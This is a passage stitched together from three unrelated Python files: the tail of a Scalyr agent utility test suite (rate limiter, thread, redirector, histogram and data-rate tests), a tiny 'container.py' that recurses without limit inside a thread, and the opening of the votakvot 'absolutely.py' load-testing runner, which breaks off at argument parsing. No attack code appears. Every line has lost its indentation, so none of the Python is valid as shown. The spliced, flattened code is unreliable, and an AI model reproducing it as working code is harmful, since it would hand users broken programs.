self.assertFalse(self.charge_if_available(10))
self.advance_time(5)
self.assertFalse(self.charge_if_available(10))
def test_zero_bucket_fill_rate(self):
self.__test_rate = RateLimiter(100, 0, current_time=0)
self.assertTrue(self.charge_if_available(20))
self.assertTrue(self.charge_if_available(80))
self.assertFalse(self.charge_if_available(1))
self.advance_time(1)
self.assertFalse(self.charge_if_available(20))
self.advance_time(5)
self.assertFalse(self.charge_if_available(20))
def test_refill(self):
self.assertTrue(self.charge_if_available(60))
self.assertFalse(self.charge_if_available(60))
self.advance_time(1)
self.assertFalse(self.charge_if_available(60))
self.advance_time(1)
self.assertTrue(self.charge_if_available(60))
def fake_sleep(self, seconds):
self.__last_sleep_amount = seconds
self.advance_time(seconds)
def test_basic_use_sleep(self):
with mock.patch("scalyr_agent.util.time.sleep", self.fake_sleep):
self.__last_sleep_amount = -1
self.block_until_charge_succeeds(20)
self.assertEqual(self.__last_sleep_amount, -1)
self.block_until_charge_succeeds(80)
self.assertEqual(self.__last_sleep_amount, -1)
self.block_until_charge_succeeds(1)
self.assertEqual(self.__last_sleep_amount, 0.1)
def test_custom_bucket_size_and_rate_sleep(self):
with mock.patch("scalyr_agent.util.time.sleep", self.fake_sleep):
self.__last_sleep_amount = -1
self.__test_rate = RateLimiter(10, 1, current_time=0)
self.block_until_charge_succeeds(10)
self.assertEqual(self.__last_sleep_amount, -1)
self.block_until_charge_succeeds(10)
self.assertEqual(self.__last_sleep_amount, 10)
self.advance_time(15)
self.block_until_charge_succeeds(20)
self.assertEqual(self.__last_sleep_amount, 10)
def test_zero_bucket_fill_rate_sleep(self):
self.__test_rate = RateLimiter(100, 0, current_time=0)
self.assertRaises(ValueError, self.block_until_charge_succeeds, 20)
def test_refill_sleep(self):
with mock.patch("scalyr_agent.util.time.sleep", self.fake_sleep):
self.__last_sleep_amount = -1
self.block_until_charge_succeeds(60)
self.assertEqual(self.__last_sleep_amount, -1)
self.block_until_charge_succeeds(60)
self.assertEqual(self.__last_sleep_amount, 2)
self.advance_time(1)
self.block_until_charge_succeeds(60)
self.assertEqual(self.__last_sleep_amount, 5)
def test_charge_greater_than_bucket_size_sleep(self):
with mock.patch("scalyr_agent.util.time.sleep", self.fake_sleep):
self.__last_sleep_amount = -1
self.__test_rate = RateLimiter(10, 1, current_time=0)
self.block_until_charge_succeeds(20)
self.assertEqual(self.__last_sleep_amount, 10)
class TestRunState(ScalyrTestCase):
def test_basic_use(self):
# We use a FakeRunState for testing just so we do not accidentally sleep.
run_state = FakeRunState()
self.assertTrue(run_state.is_running())
run_state.sleep_but_awaken_if_stopped(1.0)
self.assertEquals(run_state.total_times_slept, 1)
run_state.stop()
self.assertFalse(run_state.is_running())
def test_sleeping_already_stopped(self):
run_state = FakeRunState()
run_state.stop()
run_state.sleep_but_awaken_if_stopped(1.0)
self.assertEquals(run_state.total_times_slept, 0)
def test_callbacks(self):
self.called = False
def on_stop():
self.called = True
run_state = FakeRunState()
run_state.register_on_stop_callback(on_stop)
run_state.stop()
self.assertTrue(self.called)
# Make sure it is immediately invoked if already stopped.
self.called = False
run_state.register_on_stop_callback(on_stop)
self.assertTrue(self.called)
class TestStoppableThread(ScalyrTestCase):
def setUp(self):
super(TestStoppableThread, self).setUp()
self._run_counter = 0
def test_basic_use(self):
        # Since the ScalyrTestCase sets the name prefix, we need to set it back to None to get an unmodified name.
StoppableThread.set_name_prefix(None)
test_thread = StoppableThread("Testing", self._run_method)
self.assertEqual(test_thread.getName(), "Testing")
test_thread.start()
test_thread.stop()
self.assertTrue(self._run_counter > 0)
def test_name_prefix(self):
StoppableThread.set_name_prefix("test_name_prefix: ")
test_thread = StoppableThread("Testing", self._run_method)
self.assertEqual(test_thread.getName(), "test_name_prefix: Testing")
test_thread.start()
test_thread.stop()
self.assertTrue(self._run_counter > 0)
def test_name_prefix_with_none(self):
StoppableThread.set_name_prefix("test_name_prefix: ")
test_thread = StoppableThread(target=self._run_method)
self.assertEqual(test_thread.getName(), "test_name_prefix: ")
test_thread.start()
test_thread.stop()
self.assertTrue(self._run_counter > 0)
def test_basic_extending(self):
class TestThread(StoppableThread):
def __init__(self):
self.run_counter = 0
StoppableThread.__init__(self, "Test thread")
def run_and_propagate(self):
self.run_counter += 1
while self._run_state.is_running():
self.run_counter += 1
self._run_state.sleep_but_awaken_if_stopped(0.03)
test_thread = TestThread()
test_thread.start()
test_thread.stop()
self.assertTrue(test_thread.run_counter > 0)
def test_exception(self):
class TestException(Exception):
pass
def throw_an_exception(run_state):
run_state.is_running()
raise TestException()
test_thread = StoppableThread("Testing", throw_an_exception)
test_thread.start()
caught_it = False
try:
test_thread.stop()
except TestException:
caught_it = True
self.assertTrue(caught_it)
def test_is_alive(self):
class TestThread(StoppableThread):
def __init__(self):
self.run_counter = 0
StoppableThread.__init__(self, "Test thread")
def run_and_propagate(self):
while self._run_state.is_running():
self._run_state.sleep_but_awaken_if_stopped(0.03)
test_thread_1 = TestThread()
test_thread_2 = StoppableThread("Testing", self._run_method)
test_threads = [test_thread_1, test_thread_2]
for test_thread in test_threads:
self.assertFalse(test_thread.isAlive())
if six.PY3:
self.assertFalse(test_thread.is_alive())
test_thread.start()
self.assertTrue(test_thread.isAlive())
if six.PY3:
self.assertTrue(test_thread.is_alive())
test_thread.stop()
self.assertFalse(test_thread.isAlive())
if six.PY3:
self.assertFalse(test_thread.is_alive())
def _run_method(self, run_state):
self._run_counter += 1
while run_state.is_running():
self._run_counter += 1
run_state.sleep_but_awaken_if_stopped(0.03)
def test_register_on_stop_callback(self):
self.callback_called = False
def fake_callback():
self.callback_called = True
run_state = scalyr_util.RunState()
run_state.register_on_stop_callback(fake_callback)
run_state.stop()
self.assertTrue(self.callback_called)
def test_remove_on_stop_callback(self):
self.callback_called = False
def fake_callback():
self.callback_called = True
run_state = scalyr_util.RunState()
run_state.register_on_stop_callback(fake_callback)
run_state.remove_on_stop_callback(fake_callback)
run_state.stop()
self.assertFalse(self.callback_called)
class TestScriptEscalator(ScalyrTestCase):
def tearDown(self):
super(TestScriptEscalator, self).tearDown()
if "__main__" in sys.modules:
del sys.modules["__main__"]
def test_is_user_change_required(self):
(test_instance, controller) = self.create_instance("czerwin", "fileA", "steve")
self.assertTrue(test_instance.is_user_change_required())
(test_instance, controller) = self.create_instance(
"czerwin", "fileA", "czerwin"
)
self.assertFalse(test_instance.is_user_change_required())
def test_change_user_and_rerun_script(self):
# NOTE: __main__.__file__ might not be set when running tests under pytests or nosetests
mock_main = mock.Mock()
mock_main.__file__ = "/tmp/file.py"
sys.modules["__main__"] = mock_main
(test_instance, controller) = self.create_instance("czerwin", "fileA", "steve")
self.assertEquals(test_instance.change_user_and_rerun_script("random"), 0)
self.assertEquals(controller.call_count, 1)
self.assertEquals(controller.last_call["user"], "steve")
self.assertEqual(controller.last_call["script_file"], "/tmp/file.py")
def create_instance(self, current_user, config_file, config_owner):
controller = TestScriptEscalator.ControllerMock(
current_user, config_file, config_owner
)
# noinspection PyTypeChecker
return ScriptEscalator(controller, config_file, os.getcwd()), controller
class ControllerMock(object):
def __init__(self, running_user, expected_config_file, config_owner):
self.__running_user = running_user
self.__expected_config_file = expected_config_file
self.__config_owner = config_owner
self.last_call = None
self.call_count = 0
def get_current_user(self):
return self.__running_user
def get_file_owner(self, config_file_path):
assert self.__expected_config_file == config_file_path
if self.__expected_config_file == config_file_path:
return self.__config_owner
else:
return None
def run_as_user(self, user, script_file_path, script_binary, script_args):
self.call_count += 1
self.last_call = {
"user": user,
"script_file": script_file_path,
"script_binary": script_binary,
"script_args": script_args,
}
return 0
class TestRedirectorServer(ScalyrTestCase):
"""Tests the RedirectorServer code using fakes for stdout, stderr and the channel.
"""
def setUp(self):
super(TestRedirectorServer, self).setUp()
# Allows us to watch what bytes are being sent to the client.
self._channel = FakeServerChannel()
# Allows us to write bytes to stdout, stderr without them going to the terminal.
self._sys = FakeSys()
self._server = RedirectorServer(self._channel, sys_impl=self._sys)
def test_sending_str(self):
self._server.start()
# Verify that the server told the channel to accept the next client connection.
self.assertEquals(self._channel.accept_count, 1)
# Simulate writing to stdout.
self._sys.stdout.write("Testing")
# Make sure we wrote a message to the channel
self.assertEquals(self._channel.write_count, 1)
(stream_id, content) = self._parse_sent_bytes(self._channel.last_write)
self.assertEquals(stream_id, 0)
self.assertEquals(content, "Testing")
def test_sending_unicode(self):
self._server.start()
self.assertEquals(self._channel.accept_count, 1)
self._sys.stdout.write("caf\xe9")
self.assertEquals(self._channel.write_count, 1)
(stream_id, content) = self._parse_sent_bytes(self._channel.last_write)
self.assertEquals(stream_id, 0)
self.assertEquals(content, "caf\xe9")
def test_sending_to_stderr(self):
self._server.start()
self.assertEquals(self._channel.accept_count, 1)
self._sys.stderr.write("Testing again")
self.assertEquals(self._channel.write_count, 1)
(stream_id, content) = self._parse_sent_bytes(self._channel.last_write)
self.assertEquals(stream_id, 1)
self.assertEquals(content, "Testing again")
def test_connection_failure(self):
# Set the channel to simulate a connection timeout.
self._channel.timeout_connection = True
caught_it = False
try:
# Make sure that we get an exception.
self._server.start()
except RedirectorError:
caught_it = True
self.assertTrue(caught_it)
def _parse_sent_bytes(self, content):
"""Parses the stream id and the actual content from the encoded content string sent by the server.
@param content: The string sent by the server.
@type content: six.binary_type
@return: A tuple of the stream_id and the actual content encoded in the sent string.
@rtype: (int,six.text_type)
"""
prefix_code = content[0:4]
# 2->TODO struct.pack|unpack in python < 2.7.7 does not allow unicode format string.
code = compat.struct_unpack_unicode("i", prefix_code)[0]
stream_id = code % 2
num_bytes = code >> 1
self.assertEquals(len(content), num_bytes + 4)
decoded_str = content[4:].decode("utf-8")
return stream_id, decoded_str
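# A worked example of the framing parsed above (illustration only, not part of the tests):
# sending "Hi" on stderr (stream_id=1) encodes code = len(b"Hi") * 2 + 1 = 5, so the frame is
# the struct-packed "i" value 5 followed by b"Hi"; the reader recovers stream_id = 5 % 2 = 1
# and num_bytes = 5 >> 1 = 2, then decodes the remaining two bytes as UTF-8.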
class TestRedirectorClient(ScalyrTestCase):
"""Test the RedirectorClient by faking out the client channel and also the clock.
"""
def setUp(self):
super(TestRedirectorClient, self).setUp()
self._fake_sys = FakeSys()
        # Since the client runs in a separate thread that blocks waiting for input from the server, we have to
        # simulate time using a fake clock.  That allows us to wake up the client thread from time to time.
self._fake_clock = scalyr_util.FakeClock()
# The fake channel allows us to insert bytes being sent by the server.
self._client_channel = FakeClientChannel(self._fake_clock)
self._client = RedirectorClient(
self._client_channel, sys_impl=self._fake_sys, fake_clock=self._fake_clock
)
self._client.start()
# Wait until the client thread begins to block for the initial accept from the server.
self._fake_clock.block_until_n_waiting_threads(1)
def tearDown(self):
if self._client is not None:
self._client.stop(wait_on_join=False)
self._fake_clock.advance_time(set_to=59.0)
self._client.join()
def test_receiving_bytes(self):
# Simulate accepting the connection.
self._accept_client_connection()
self._send_to_client(0, "Testing")
        # Wait until bytes have been written to stdout by the client thread.
self._fake_sys.stdout.wait_for_bytes(1.0)
self.assertEquals(self._fake_sys.stdout.last_write, "Testing")
def test_receiving_unicode(self):
self._accept_client_connection()
self._send_to_client(0, "caf\xe9")
self._fake_sys.stdout.wait_for_bytes(1.0)
self.assertEquals(self._fake_sys.stdout.last_write, "caf\xe9")
def test_connection_timeout(self):
# We advance the time past 60 seconds which is the connection time out.
self._fake_clock.advance_time(set_to=61.0)
got_it = False
try:
            # Even though we have not called stop on the thread and the server has not closed the connection,
            # we should still see the client thread terminate because of the exception it raises.
self._client.join()
except RedirectorError:
got_it = True
self._client = None
self.assertTrue(got_it)
def test_close_from_server(self):
self._accept_client_connection()
self._send_to_client(-1, "")
# Even though we haven't called stop on the client thread, it should still end because the server sent
# the signal to stop/close.
self._client.join()
self._client = None
def test_stopped_during_connection(self):
self._client.stop(wait_on_join=False)
        # We have to wake all threads so the client thread will notice it has been stopped.
self._fake_clock.wake_all_threads()
self._client.join()
self._client = None
def test_stopped_during_reading(self):
self._accept_client_connection()
self._client.stop(wait_on_join=False)
        # We have to wake all threads so the client thread will notice it has been stopped.
self._fake_clock.wake_all_threads()
self._client.join()
self._client = None
def _accept_client_connection(self):
self._client_channel.simulate_server_connect()
def _send_to_client(self, stream_id, content):
if type(content) is six.text_type:
encoded_content = six.text_type(content).encode("utf-8")
else:
encoded_content = content
code = len(encoded_content) * 2 + stream_id
# 2->TODO struct.pack|unpack in python < 2.7.7 does not allow unicode format string.
self._client_channel.simulate_server_write(
compat.struct_pack_unicode("i", code) + encoded_content
)
class TestRedirectionService(ScalyrTestCase):
"""Tests both the RedirectorServer and the RedirectorClient communicating together.
"""
def setUp(self):
super(TestRedirectionService, self).setUp()
self._client_sys = FakeSys()
self._server_sys = FakeSys()
self._fake_clock = scalyr_util.FakeClock()
self._client_channel = FakeClientChannel(self._fake_clock)
self._server_channel = FakeServerChannel(self._client_channel)
self._client = RedirectorClient(
self._client_channel, sys_impl=self._client_sys, fake_clock=self._fake_clock
)
self._server = RedirectorServer(self._server_channel, sys_impl=self._server_sys)
self._client.start()
self._server.start()
def test_end_to_end(self):
self._server_sys.stdout.write("Test full")
self._server.stop()
self._client.stop()
class FakeServerChannel(RedirectorServer.ServerChannel):
"""A mock-like object for the ServerChannel that allows us to see if certain methods were invoked and with
what arguments.
"""
def __init__(self, client_channel=None):
# Gives the counts of the various methods.
self.close_count = 0
self.accept_count = 0
self.write_count = 0
# The last string that was used when invoking `write`.
self.last_write = None
# If set to True, when the server invokes `accept_client`, it will simulate a connection timeout.
self.timeout_connection = False
# If not None, the fake client channel to send the bytes from `write`.
self._client_channel = client_channel
def accept_client(self, timeout=None):
self.accept_count += 1
if not self.timeout_connection and self._client_channel is not None:
self._client_channel.simulate_server_connect()
return not self.timeout_connection
def write(self, content):
self.write_count += 1
self.last_write = content
if self._client_channel is not None:
self._client_channel.simulate_server_write(content)
def close(self):
self.close_count += 1
class FakeClientChannel(object):
"""Fakes out the RedirectorClient.ClientChannel interface.
This allows us to simulate the connection being accepted by the server and bytes being sent by the server.
"""
def __init__(self, fake_clock):
self._lock = threading.Lock()
self._allow_connection = False
self._pending_content = b""
self._fake_clock = fake_clock
def connect(self):
self._lock.acquire()
result = self._allow_connection
self._lock.release()
return result
def peek(self):
self._lock.acquire()
if self._pending_content is not None:
bytes_to_read = len(self._pending_content)
else:
bytes_to_read = 0
self._lock.release()
return bytes_to_read, 0
def read(self, num_bytes_to_read):
self._lock.acquire()
assert num_bytes_to_read <= len(self._pending_content)
result = self._pending_content[0:num_bytes_to_read]
self._pending_content = self._pending_content[num_bytes_to_read:]
self._lock.release()
return result
def close(self):
pass
def simulate_server_connect(self):
self._lock.acquire()
self._allow_connection = True
self._lock.release()
self._simulate_busy_loop_advance()
def simulate_server_write(self, content):
self._lock.acquire()
self._pending_content = b"%s%s" % (self._pending_content, content)
self._lock.release()
self._simulate_busy_loop_advance()
def _simulate_busy_loop_advance(self):
self._fake_clock.advance_time(increment_by=0.4)
class FakeSys(object):
def __init__(self):
self.stdout = FakeSys.FakeFile()
self.stderr = FakeSys.FakeFile()
class FakeFile(object):
def __init__(self):
self._condition = threading.Condition()
self._last_write = None
def write(self, content):
self._condition.acquire()
self._last_write = content
self._condition.notifyAll()
self._condition.release()
@property
def last_write(self):
self._condition.acquire()
result = self._last_write
self._condition.release()
return result
def wait_for_bytes(self, timeout):
self._condition.acquire()
try:
if self._last_write is not None:
return
self._condition.wait(timeout)
finally:
self._condition.release()
class TestHistogramTracker(ScalyrTestCase):
"""Tests the HistogramTracker abstraction.
"""
def setUp(self):
super(TestHistogramTracker, self).setUp()
self._testing = HistogramTracker([10, 25, 50, 100])
def test_count(self):
self.assertEqual(self._testing.count(), 0)
self._testing.add_sample(1)
self._testing.add_sample(11)
self.assertEqual(self._testing.count(), 2)
self._testing.reset()
self.assertEqual(self._testing.count(), 0)
def test_average(self):
self._testing.add_sample(1)
self._testing.add_sample(11)
self.assertAlmostEqual(self._testing.average(), 6.0)
self._testing.reset()
self.assertIsNone(self._testing.average())
self._testing.add_sample(6)
self.assertAlmostEqual(self._testing.average(), 6.0)
def test_min(self):
self._testing.add_sample(1)
self._testing.add_sample(11)
self.assertAlmostEqual(self._testing.min(), 1.0)
self._testing.add_sample(15)
self.assertAlmostEqual(self._testing.min(), 1.0)
self._testing.add_sample(0.5)
self.assertAlmostEqual(self._testing.min(), 0.5)
self._testing.reset()
self.assertIsNone(self._testing.min())
self._testing.add_sample(15)
self.assertAlmostEqual(self._testing.min(), 15.0)
def test_max(self):
self._testing.add_sample(1)
self._testing.add_sample(11)
self.assertAlmostEqual(self._testing.max(), 11.0)
self._testing.add_sample(15)
self.assertAlmostEqual(self._testing.max(), 15.0)
self._testing.add_sample(0.5)
self.assertAlmostEqual(self._testing.max(), 15.0)
self._testing.reset()
self.assertIsNone(self._testing.max())
self._testing.add_sample(0)
self.assertAlmostEqual(self._testing.max(), 0)
def test_buckets(self):
buckets = self._buckets_to_list()
self.assertEqual(len(buckets), 0)
self._testing.add_sample(2)
buckets = self._buckets_to_list()
self.assertEqual(len(buckets), 1)
self.assertBucketEquals(buckets[0], (1, 2, 10))
self._testing.add_sample(50)
buckets = self._buckets_to_list()
self.assertEqual(len(buckets), 2)
self.assertBucketEquals(buckets[0], (1, 2, 10))
self.assertBucketEquals(buckets[1], (1, 50, 100))
self._testing.add_sample(5)
buckets = self._buckets_to_list()
self.assertEqual(len(buckets), 2)
self.assertBucketEquals(buckets[0], (2, 2, 10))
self.assertBucketEquals(buckets[1], (1, 50, 100))
self._testing.add_sample(200)
buckets = self._buckets_to_list()
self.assertEqual(len(buckets), 3)
self.assertBucketEquals(buckets[0], (2, 2, 10))
self.assertBucketEquals(buckets[1], (1, 50, 100))
self.assertBucketEquals(buckets[2], (1, 100, 200.01))
def test_estimate_percentile(self):
self.assertIsNone(self._testing.estimate_median())
self._testing.add_sample(0)
self._testing.add_sample(3)
self._testing.add_sample(4)
# Since all of the values fall into the first bucket, the estimate of the percentile will be the same for all
# percentiles.
self.assertAlmostEqual(self._testing.estimate_percentile(0.1), 5.0)
self.assertAlmostEqual(self._testing.estimate_percentile(0.5), 5.0)
self.assertAlmostEqual(self._testing.estimate_percentile(1.0), 5.0)
self._testing.add_sample(11)
self._testing.add_sample(12)
self._testing.add_sample(13)
self._testing.add_sample(55)
self.assertAlmostEqual(self._testing.estimate_percentile(0.1), 5.0)
self.assertAlmostEqual(self._testing.estimate_percentile(0.5), 17.5)
self.assertAlmostEqual(self._testing.estimate_percentile(1.0), 75.0)
def test_summarize(self):
self.assertEqual(self._testing.summarize(), "(count=0)")
self._testing.add_sample(2)
self._testing.add_sample(4)
self._testing.add_sample(45)
self._testing.add_sample(200)
self.assertEqual(
self._testing.summarize(),
"(count=4,avg=62.75,min=2.00,max=200.00,median=6.00)",
)
def assertBucketEquals(self, first, second):
self.assertEquals(first[0], second[0], msg="The counts do not equal")
self.assertAlmostEquals(
first[1], second[1], msg="The lower bounds do not equal"
)
self.assertAlmostEquals(
first[2], second[2], msg="The upper bounds do not equal"
)
def _buckets_to_list(self):
result = []
for count, lower, upper in self._testing.buckets():
result.append((count, lower, upper))
return result
class TestParseValueWithRate(ScalyrTestCase):
def test_numerators(self):
self.assertEqual(100, scalyr_util.parse_data_rate_string("100 B/s"))
self.assertEqual(100 * 1000, scalyr_util.parse_data_rate_string("100 kB/s"))
self.assertEqual(
100 * 1000 * 1000, scalyr_util.parse_data_rate_string("100 mB/s")
)
self.assertEqual(
100 * 1000 * 1000 * 1000, scalyr_util.parse_data_rate_string("100 gB/s")
)
self.assertEqual(
100 * 1000 * 1000 * 1000 * 1000,
scalyr_util.parse_data_rate_string("100 tB/s"),
)
self.assertEqual(100 * 1024, scalyr_util.parse_data_rate_string("100 kiB/s"))
self.assertEqual(
100 * 1024 * 1024, scalyr_util.parse_data_rate_string("100 miB/s")
)
self.assertEqual(
100 * 1024 * 1024 * 1024, scalyr_util.parse_data_rate_string("100 giB/s")
)
self.assertEqual(
100 * 1024 * 1024 * 1024 * 1024,
scalyr_util.parse_data_rate_string("100 tiB/s"),
)
def test_denominators(self):
self.assertEqual(100000, scalyr_util.parse_data_rate_string("100000 B/s"))
self.assertEqual(
100000 / 60.0, scalyr_util.parse_data_rate_string("100000 B/m")
)
self.assertEqual(
100000 / 60.0 / 60.0, scalyr_util.parse_data_rate_string("100000 B/h")
)
self.assertEqual(
100000 / 60.0 / 60.0 / 24.0,
scalyr_util.parse_data_rate_string("100000 B/d"),
)
self.assertEqual(
100000 / 60.0 / 60.0 / 24.0 / 7.0,
scalyr_util.parse_data_rate_string("100000 B/w"),
)
def test_spacing(self):
self.assertEqual(1024, scalyr_util.parse_data_rate_string("1kiB/s"))
self.assertEqual(1024, scalyr_util.parse_data_rate_string("1 kiB/s"))
self.assertEqual(1024, scalyr_util.parse_data_rate_string("1\tkiB/s"))
self.assertEqual(1024, scalyr_util.parse_data_rate_string("1 \t \t kiB/s"))
def test_capitalization(self):
self.assertEqual(100, scalyr_util.parse_data_rate_string("100 B/S"))
self.assertRaises(ValueError, scalyr_util.parse_data_rate_string, "100 b/S")
self.assertEqual(100, scalyr_util.parse_data_rate_string("100 B/s"))
self.assertRaises(ValueError, scalyr_util.parse_data_rate_string, "100 b/s")
self.assertEqual(1024, scalyr_util.parse_data_rate_string("1KiB/S"))
self.assertEqual(1024, scalyr_util.parse_data_rate_string("1kIB/S"))
self.assertEqual(1000, scalyr_util.parse_data_rate_string("1KB/S"))
self.assertEqual(1000, scalyr_util.parse_data_rate_string("1kB/S"))
self.assertRaises(ValueError, scalyr_util.parse_data_rate_string, "1Kb/S")
self.assertRaises(ValueError, scalyr_util.parse_data_rate_string, "1kib/S")
self.assertEqual(1024, scalyr_util.parse_data_rate_string("1KiB/s"))
self.assertEqual(1024, scalyr_util.parse_data_rate_string("1kIB/s"))
self.assertEqual(1000, scalyr_util.parse_data_rate_string("1KB/s"))
self.assertEqual(1000, scalyr_util.parse_data_rate_string("1kB/s"))
self.assertRaises(ValueError, scalyr_util.parse_data_rate_string, "1Kb/s")
self.assertRaises(ValueError, scalyr_util.parse_data_rate_string, "1kb/s")
def test_values(self):
self.assertEqual(100, scalyr_util.parse_data_rate_string("100 B/s"))
self.assertEqual(-100, scalyr_util.parse_data_rate_string("-100 B/s"))
self.assertEqual(0, scalyr_util.parse_data_rate_string("0 B/s"))
self.assertEqual(0, scalyr_util.parse_data_rate_string("0 gB/s"))
self.assertEqual(0, scalyr_util.parse_data_rate_string("-0 gB/s"))
self.assertEqual(-100.2456, scalyr_util.parse_data_rate_string("-100.2456 B/s"))
self.assertEqual(
199.000001, scalyr_util.parse_data_rate_string("199.000001 B/s")
)
self.assertEqual(
1024 * 1024 * 1024 * 1024 / 60.0 / 60.0 / 24.0 / 7.0,
scalyr_util.parse_data_rate_string("1 tiB/w"),
)
def test_invalid_inputs(self):
self.assertRaises(ValueError, scalyr_util.parse_data_rate_string, "B/s")
self.assertRaises(ValueError, scalyr_util.parse_data_rate_string, "100")
self.assertRaises(ValueError, scalyr_util.parse_data_rate_string, "100 /")
self.assertRaises(ValueError, scalyr_util.parse_data_rate_string, "- B/s")
self.assertRaises(ValueError, scalyr_util.parse_data_rate_string, "100 YB/s")
self.assertRaises(ValueError, scalyr_util.parse_data_rate_string, "100 B/C")
self.assertRaises(ValueError, scalyr_util.parse_data_rate_string, "100 D/s")
self.assertRaises(ValueError, scalyr_util.parse_data_rate_string, "100 g1/s")
|
container.py
|
import threading
import sys
def fun(i):
try:
fun(i+1)
except:
sys.exit(0)
t = threading.Thread(target=fun, args=[1])
t.start()
|
absolutely.py
|
#!/usr/bin/env python
"""
`votakvot-ABsolutely` is a script you can use to quickly smoke-test your application.
It runs a user-provided python function from many greenlets (or threads) and collects time statistics.
ABsolutely was inspired by https://github.com/tarekziade/boom
It behaves similarly to Apache Bench, but calls a python callback instead of making HTTP calls.
"""
from __future__ import annotations
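# A minimal usage sketch (``myapp.ping`` and its argument are hypothetical examples, not part of this repo):
#   python absolutely.py -c 10 -n 1000 myapp.ping timeout=0.5
# runs ``myapp.ping(timeout=0.5)`` 1000 times across 10 worker threads (or greenlets when
# --gevent is given) and prints timing statistics.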
import contextlib
import collections
import datetime
import argparse
import importlib
import threading
import time
import math
import functools
import logging
import sys
import os
import queue
import traceback
import votakvot
import votakvot.core
import votakvot.meta
from votakvot.data import FancyDict
logger = logging.getLogger(__file__)
def _resolve_obj_rec(name: str):
try:
return importlib.import_module(name)
except ImportError:
if "." not in name: # no chance
raise
ns_name, obj_name = name.rsplit(".", 1)
mod = _resolve_obj_rec(ns_name)
return getattr(mod, obj_name)
def resolve_obj(name: str):
orig_sys_path = list(sys.path)
try:
sys.path.append(os.getcwd())
return _resolve_obj_rec(name)
finally:
sys.path.clear()
sys.path.extend(orig_sys_path)
def _calc_percentiles(data, pcts):
data = sorted(data)
size = len(data)
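    # Report a percentile only when there are enough samples to estimate it:
    # len(data) must exceed 500 / min(pct, 100 - pct), so p50 needs > 10 samples,
    # p99 needs > 500 and p99.9 needs > 5000.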
return {
pct: data[int(math.ceil((size * pct) / 100)) - 1]
for pct in pcts
if len(data) > 500 / min(pct, 100 - pct)
}
class StatsCollector:
_percentiles = [5, 10, 25, 50, 75, 90, 95, 97, 98, 99, 99.5, 99.9]
def __init__(
self,
tracker: votakvot.core.Tracker,
warmup: int = 0,
max_errors: int = 0,
lock = None,
):
self._lock = lock or contextlib.nullcontext()
self._warmup = warmup
self._started = time.time()
self._finished = None
self.tracker = tracker
self.results = collections.Counter()
self.errors = collections.Counter()
self.errors_all = collections.deque(maxlen=max_errors)
self.total_count = 0
self.total_time = 0
self.errors_count = 0
self.times_all = []
def add_result(self, result, duration, error=None):
with self._lock:
self._add_result0(result, duration, error)
def _add_result0(self, result, duration, error):
if self._warmup > 0:
self._warmup -= 1
return
elif self._warmup == 0:
self._started = time.time()
self._warmup = -1
error_repr = repr(error) if error else None
self.total_count += 1
self.results[result] += 1
self.tracker.meter({
'duration': duration,
'result': result,
'error': repr(error) if error else None,
})
if duration is not None:
self.times_all.append(duration)
self.total_time += duration
if error is not None:
self.errors[error_repr] += 1
self.errors_count += 1
self.errors_all.append(error)
def calc_stats(self):
self._finished = self._finished or time.time()
average = sum(self.times_all) / len(self.times_all) if self.times_all else None
return FancyDict(
total_count=self.total_count,
total_time=self.total_time,
real_rps=self.total_count / (self._finished - self._started),
duration=FancyDict(
average=average,
maximum=max(self.times_all),
minimum=min(self.times_all),
std_dev=math.sqrt(sum((x - average) ** 2 for x in self.times_all) / len(self.times_all)),
percentiles=_calc_percentiles(self.times_all, self._percentiles),
) if self.times_all else None,
results=[
{"result": k, "count": v}
for k, v in self.results.most_common()
],
errors_count=self.errors_count,
errors=[
{"error": k, "count": v}
for k, v in self.errors.most_common()
],
)
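# StatsCollector.calc_stats() returns a FancyDict shaped roughly like:
#   {'total_count': ..., 'total_time': ..., 'real_rps': ...,
#    'duration': {'average': ..., 'maximum': ..., 'minimum': ..., 'std_dev': ..., 'percentiles': {...}} or None,
#    'results': [{'result': ..., 'count': ...}, ...],
#    'errors_count': ..., 'errors': [{'error': ..., 'count': ...}, ...]}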
def _do_onecall(collector: StatsCollector, callback):
duration = None
error = None
result = None
start = time.time()
try:
result = callback()
except Exception as e:
error = e
else:
duration = time.time() - start
finally:
collector.add_result(result, duration, error)
class ConcurrencyEnv:
def __init__(self, concurrency):
self.global_lock = threading.RLock()
self.concurrency = concurrency
self.queue = queue.Queue(maxsize=concurrency * 4)
self.done = False
def start(self):
for i in range(self.concurrency):
self.start_worker()
def worker_run(self):
while True:
f = self.queue.get()
try:
f()
except Exception:
traceback.print_exc()
finally:
self.queue.task_done()
def shutdown(self, wait):
self.done = True
if wait:
self.queue.join()
def spawn(self, function):
if not self.done:
self.queue.put(function)
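# Note: the task queue is bounded (concurrency * 4), so spawn() blocks once the workers fall
# behind; this provides back-pressure instead of building an unbounded backlog of pending calls.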
class GeventConcurrencyEnv(ConcurrencyEnv):
@staticmethod
def gevent_install():
import gevent.monkey
gevent.monkey.patch_all()
def start_worker(self):
import gevent
g = gevent.Greenlet(run=self.worker_run)
g.start()
class ThreadConcurrencyEnv(ConcurrencyEnv):
def start_worker(self):
t = threading.Thread(target=self.worker_run, daemon=True)
t.start()
def run(
path,
callback,
params=None,
tid=None,
number=1,
warmup=0,
duration=None,
meta_providers=None,
show_progress=False,
strict=False,
max_errors=None,
concurrency_env=None,
):
assert number is None or duration is None
concurrency_env = concurrency_env or ThreadConcurrencyEnv(1)
concurrency_env.start()
meta = votakvot.meta.capture_meta(meta_providers)
tracker = votakvot.core.Tracker(path=f"{path}/{tid}", meta=meta, tid=tid)
if show_progress:
import tqdm
if duration is None:
progressbar = tqdm.tqdm(total=number, leave=False)
else:
progressbar = tqdm.tqdm(total=None)
else:
progressbar = None
def dorun(**params):
if isinstance(callback, type):
real_callback = callback(**params)
else:
real_callback = functools.partial(callback, **params)
collector = StatsCollector(
tracker,
warmup=warmup,
max_errors=max_errors,
lock=concurrency_env.global_lock,
)
def call():
_do_onecall(collector, real_callback)
if show_progress:
progressbar.update()
def spawn():
concurrency_env.spawn(call)
def checkerr():
if strict and collector.errors_all:
raise collector.errors_all[-1]
with progressbar if progressbar is not None else contextlib.nullcontext():
if number is None:
until = time.time() + duration
while time.time() < until:
spawn()
checkerr()
concurrency_env.shutdown(False)
else:
for _ in range(number + warmup):
spawn()
checkerr()
concurrency_env.shutdown(True)
checkerr()
stats = collector.calc_stats()
if isinstance(callback, type):
if hasattr(real_callback, '__close__'):
real_callback.__close__()
return stats
with votakvot.using_tracker(tracker, globally=True):
tracker.run(dorun, **(params or {}))
return votakvot.core.Trial(tracker.path)
def main(args=None):
parser = argparse.ArgumentParser(description="votakvot cli runner")
